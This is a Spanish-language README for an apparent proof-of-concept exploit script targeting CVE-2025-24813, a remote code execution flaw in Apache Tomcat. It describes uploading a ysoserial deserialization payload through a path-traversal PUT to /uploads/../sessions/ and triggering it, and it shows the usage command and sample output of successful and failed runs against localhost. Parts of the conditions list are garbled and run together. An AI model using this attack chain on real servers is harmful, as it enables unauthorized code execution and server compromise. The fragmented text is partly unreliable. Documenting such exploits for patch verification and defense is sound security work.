
Este repositorio contiene un script automatizado de Prueba de Concepto (PoC) para explotar **CVE-2025-24813**, una vulnerabilidad de Ejecución Remota de Código (RCE) en Apache Tomcat. La vulnerabilidad permite a un atacante subir una carga útil serializada maliciosa al servidor, lo que conduce a la ejecución de código arbitrario mediante deserialización cuando se cumplen condiciones específicas.
CVE-2025-24813 es una vulnerabilidad RCE teórica en Apache Tomcat que aprovecha el manejo incorrecto de archivos de sesión subidos y los mecanismos de deserialización. Al subir una carga útil manipulada a un directorio con permisos de escritura (p. ej., /uploads/../sessions/), un atacante puede provocar la deserialización, lo que resulta en la ejecución de comandos arbitrarios en el servidor objetivo.
Para que este PoC explote exitosamente la vulnerabilidad, deben cumplirse las siguientes condiciones:
/index.jsp) y provocar la deserialización de la carga útil.ysoserial o compilar cargas útiles basadas en Java.ysoserial, el archivo ysoserial.jar debe estar disponible localmente.python CVE-2025-24813.py <target_url> [options]
[+] Server is writable via PUT: http://localhost:8081/check.txt
[*] Session ID: absholi7ly
[+] Payload generated successfully: payload.ser
[+] Payload uploaded with status 409 (Conflict): http://localhost:8081/uploads/../sessions/absholi7ly.session
[+] Exploit succeeded! Server returned 500 after deserialization.
[+] Target http://localhost:8081 is vulnerable to CVE-2025-24813!
[+] Temporary file removed: payload.ser
[+] Server is writable via PUT: http://localhost:8081/check.txt
[*] Session ID: absholi7ly
[+] Payload generated successfully: payload.ser
[-] Payload upload failed: http://localhost:8081/uploads/../sessions/absholi7ly.session (HTTP 403)
[-] Target http://localhost:8081 does not appear vulnerable or exploit failed.
[+] Temporary file removed: payload.ser